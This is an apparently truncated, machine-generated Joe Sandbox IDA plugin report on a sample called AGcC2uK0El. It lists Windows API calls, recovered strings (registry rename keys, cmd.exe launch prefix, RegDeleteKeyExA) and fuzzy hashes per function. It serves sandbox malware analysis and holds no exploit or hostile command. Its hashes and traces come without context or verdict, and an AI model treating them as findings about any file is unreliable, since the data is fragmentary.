                                                                                      • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                      • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                    • String ID: c:\directory$shell32.dll
                                                                                    • API String ID: 3376378930-1375355148
                                                                                    • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                    • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                                    • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                                    • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                                    APIs
                                                                                    • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                    • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                    • API String ID: 4130936913-2943970505
                                                                                    • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                    • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                                    • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                    • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                      • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                      • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                      • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                      • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                                    • API String ID: 854858120-3415487018
                                                                                    • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                    • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                                    • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                                    • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                                    APIs
                                                                                    • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                    • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                    • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                                                    • String ID: 2$MAINICON
                                                                                    • API String ID: 3935243913-3181700818
                                                                                    • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                    • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                                    • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                                    • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                      • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                      • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                      • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                      • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                      • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                      • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                      • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                      • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                      • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                      • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                      • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                      • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                      • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                    • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                    • API String ID: 3476490787-2767913252
                                                                                    • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                    • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                                    • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                                    • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                                    APIs
                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$Prop
                                                                                    • String ID:
                                                                                    • API String ID: 3887896539-0
                                                                                    • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                    • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                                    • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                                    • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                                    Strings
                                                                                    • PendingFileRenameOperations, xrefs: 00454C70
                                                                                    • WININIT.INI, xrefs: 00454D00
                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                                    • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                    • API String ID: 47109696-2199428270
                                                                                    • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                    • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                                    • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                                    • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: $pI$.tmp$oI
                                                                                    • API String ID: 1375471231-740224434
                                                                                    • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                    • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                                    • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                    • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                                    APIs
                                                                                    • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                    • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                    • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnumLongWindows
                                                                                    • String ID: lAB
                                                                                    • API String ID: 4191631535-3476862382
                                                                                    • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                    • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                                    • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                    • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                                    APIs
                                                                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                                    • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                    • API String ID: 588496660-1846899949
                                                                                    • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                    • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                    • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                    • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                    APIs
                                                                                    • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                                    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveChangeNotifyWindow
                                                                                    • String ID: $Need to restart Windows? %s
                                                                                    • API String ID: 1160245247-4200181552
                                                                                    • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                    • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                                    • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                    • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                    • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                    • String ID: Creating directory: %s
                                                                                    • API String ID: 2451617938-483064649
                                                                                    • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                    • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                                    • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                    • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressByteCharMultiProcWide
                                                                                    • String ID: SfcIsFileProtected$sfc.dll
                                                                                    • API String ID: 2508298434-591603554
                                                                                    • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                    • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                                    • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                    • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                                    APIs
                                                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                    • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                    • RegisterClassA.USER32(?), ref: 004164DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
